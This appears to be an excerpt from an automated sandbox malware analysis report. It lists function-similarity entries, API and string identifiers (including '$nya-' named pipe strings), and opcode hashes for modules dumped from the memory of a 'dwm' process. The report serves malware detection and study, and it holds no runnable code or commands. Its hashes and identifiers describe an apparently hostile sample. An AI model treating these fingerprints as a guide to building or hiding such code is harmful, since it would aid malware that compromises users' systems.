                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: ed68b2b49a46152e751ac607c1fda94ffa2761773422a559bba34cd9e68d9826
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: 61D17A33604FA0CAEB28DB65945C39D77B0F785B88F900215EA8957F9ADB36D589CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: 221bf94359fd7e7b1e28a2d40d6110b21edc986eb1a18df4c85078b62c1ace4e
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 0D419F73214F84CAE761CF61E45839A77B1F388B88F848129DB8947B98DF39D449CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: d0f75600af824dca34da54e32df4f6236ae98fe8b60280119b9a1718f013f19a
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 45417B32214F94DAE764CF21E44839A77B5F389B98F848229DA8907B5CDF3DC489CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$nya-childproc
                                                  • API String ID: 166002920-3933612297
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: 87974e93325af33150f708034e4ca2ca179f1c7030491a6afd5d027639728c69
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: 93113432618B60C2E710CB21F45C35A7770F389BA4F940225EA9A42EE9DF3EC148CF42
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$nya-childproc
                                                  • API String ID: 166002920-3933612297
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: e0a6551b3a49e7bdcdd879917064d0077e5fa16422dcff55c9419180316aa286
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: E7112636618A64C2F710CB61F41C35A6770F389BA4F944215EA9A12EA8CF3EC148CF40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1494451949.00000262F1EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F1EB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1eb0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000262F1CA9C6B,?,?,?,00000262F1CA945C,?,?,?,?,00000262F1CA8F65), ref: 00000262F1CA9B31
                                                  • GetLastError.KERNEL32(?,?,?,00000262F1CA9C6B,?,?,?,00000262F1CA945C,?,?,?,?,00000262F1CA8F65), ref: 00000262F1CA9B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000262F1CA9C6B,?,?,?,00000262F1CA945C,?,?,?,?,00000262F1CA8F65), ref: 00000262F1CA9B69
                                                  • FreeLibrary.KERNEL32(?,?,?,00000262F1CA9C6B,?,?,?,00000262F1CA945C,?,?,?,?,00000262F1CA8F65), ref: 00000262F1CA9BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,00000262F1CA9C6B,?,?,?,00000262F1CA945C,?,?,?,?,00000262F1CA8F65), ref: 00000262F1CA9BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000262F1D09C6B,?,?,?,00000262F1D0945C,?,?,?,?,00000262F1D08F65), ref: 00000262F1D09B31
                                                  • GetLastError.KERNEL32(?,?,?,00000262F1D09C6B,?,?,?,00000262F1D0945C,?,?,?,?,00000262F1D08F65), ref: 00000262F1D09B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000262F1D09C6B,?,?,?,00000262F1D0945C,?,?,?,?,00000262F1D08F65), ref: 00000262F1D09B69
                                                  • FreeLibrary.KERNEL32(?,?,?,00000262F1D09C6B,?,?,?,00000262F1D0945C,?,?,?,?,00000262F1D08F65), ref: 00000262F1D09BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,00000262F1D09C6B,?,?,?,00000262F1D0945C,?,?,?,?,00000262F1D08F65), ref: 00000262F1D09BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448872342.00000262F1D31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d30000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $nya-
                                                  • API String ID: 756756679-1266920357
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Value$FreeHeap
                                                  • String ID:
                                                  • API String ID: 365477584-0
                                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction ID: 6c5dcdc07d278e79b2e88af4f912f060bd502bf2eec486bf83c64b43b71d1586
                                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                  • Instruction Fuzzy Hash: A9114C31314E70C2FA186731689D3AE2272AB89FE0FD44625A86A56FDEDE3EC4494740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: e66e74fe270ce6d8f09fa9ebcda9fa64f72df942dfecb16eb5d78e9ad60ceebd
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: 99011B71705E50C6EB54DB12A86C35963B1F788FC0F8840359E5D83B95DE3AC989CB41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: 922fdaf62109822db50c4d30f3ea032cb8b5ade3dfa48254d2e2c75aeece13d1
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: 2C010971704A6486FB14DB52A89C35A62B5F78DFC0F8840359E5953B64DE3DC58ACB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: d97c29b32172ed4424d5d4fe8b8a45f99578b57b1518c16f068ddcfa3f4e46ed
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 06015774605F60C2EB65DB26F85C31A22B0AB48B41F940038DA4D46BE5EF3EC45CCB02
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: a68e317433246dfec9876a18cc917fcfd4046e7732792400411306add0e66c53
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 6D014C75211FA4C6FB249B61E84C71A73B4BB4AB45F844128DA5D17BA9EF3EC54CCB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: 46a08e3e9825a35e292d4ae123f8ecda1783c5e34c1f2133b7e332fb7f0da7b3
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 61F03CB2304A95D2EB60CB21F99C3596371F744B88FC440319A4986ED5DE6EC68DCB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: 627d793779b4fb71c53698818714985133b41b2a005b23078a6382d94af29437
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 84F03C72304E99D2FB208B61E58C3596371F749B88FC440219A4946D68DF6EC69CCB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: 2d70aa3d07742b66c1db06fbcd7bb005ca2c9c5ccb713c61cdb6be3a7e0e1e7a
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: F6F08274304FA0C1EA45CB13B92C1196670BB48FC0FC89030EE0A87F99CE3DC4498B01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: 81abed9903feba85f37031435fbbdb1edac0442b8016a88f6e98db0da8679678
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 1BF09A31211E61C1EA15CB24E8AD3696330EB897A0FD40339DAAA869E4CF3EC44CC702
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: b253053fa2b6f8e9201f0124f0b901716077b6c4a04d9180ad6cf466b8c26997
